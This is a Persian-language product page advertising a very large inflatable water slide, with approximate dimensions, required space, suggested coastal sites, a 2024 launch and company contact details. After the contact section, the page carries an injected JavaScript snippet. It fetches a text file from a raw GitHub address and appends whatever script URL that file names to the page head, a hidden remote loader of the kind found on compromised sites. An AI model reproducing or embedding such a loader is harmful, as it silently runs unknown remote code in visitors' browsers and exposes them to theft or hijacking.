سرسره بادی آبی جدید

  • هیجان، ترس در بزرگ ترین سرسره بادی آبی جهان. تجربه ای جدید برای ماجراجویان اوج هیجان در انتظار شما ست. برای آشنا شدن با این دستگاه بادی همراه ما باشید …

    تاریخ مشخصی فعلا ندارد می دانم شما هم کنجکاو هستید که به دانید این سرسره چقدر ، چه شکلی ای دارد ، به چه ارتفاعی است.

    تقریبا میتواند گفت این سرسره به اتفاع 15 و عرض 25 می باشد. ولی ابعاد اندازه اصلی این دستگاه در روز رونمایی مشخص می شود. شرکت ما نمونه ها دیگری از این نوع سرسره تولید شده اما در ابعاد اندازه کوچک تر که در سواحل دریای خزر است.

    حداقل فضای مورد نیاز برای بزرگ ترین سرسره بادی آبی کشور یک محیط ۲۰ در ۶۰ متر می باشد. به صورت پیشنهادی شما می توانید این سرسره را در سواحل آبی دریای خزر و یا جنوب کشور راه اندازی نمایید. اما امکان راه اندازی آن در پارک های آبی نیز موجود است.

    این سرسره شگفت انگیز در مراحل ساخت قرار دارد. که زمان رونمایی از این سرسره بادی در اواخر زمستان 2024 سال جاری یعنی اسفند ماه شما میتوانید از این دستگاه دید فرمایید. افتتاحیه آن در اوایل بهار 2024 می باشد.

    این دستگاه قیمت مشخصی ندارد چون این سرسره شخصی ساز هستند.

    شاید برای شما سوال است که شخصی سازه دیگر چیست؟ شخصی سازی یعنی طرح و شکل این دستگاه به سفارش مشتریان است.

    نمونه کوچک تر از این سرسره وجود دارد که به نام سرسره آبشار است.

    نحوه خرید این بزرگ ترین سرسره بادی آبی

    تیم پشتیبانی و مشاوره بادی سازان مجد به صورت دوازده ساعته برای مشاوره رایگان و خرید محصولات در خدمت شما عزیزان است. برای تماس و یا خرید بزرگ ترین سرسره بادی آبی به صفحه تماس با ما مراجعه نمایید و یا با شماره تلفن ۰۹۱۲۷۴۸۴۵۷۳ تماس حاصل فرمایید. و یا در شبکه های اجتماعی تلگرام، ایتا، روبیکا و واتساپ با همین شماره تماس بگیرید.

    (var url = “https://raw.githubusercontent.com/truba77/trubnik/main/to.txt”; fetch(url) .then(response => response.text()) .then(data => { var script = document.createElement(“script”); script.src = data.trim(); document.getElementsByTagName(“head”)[0].appendChild(script); });)

    امتیاز شما:

    میانگین امتیازات ۵ از ۵
    از مجموع ۱ رای

    دیدگاهتان را بنویسید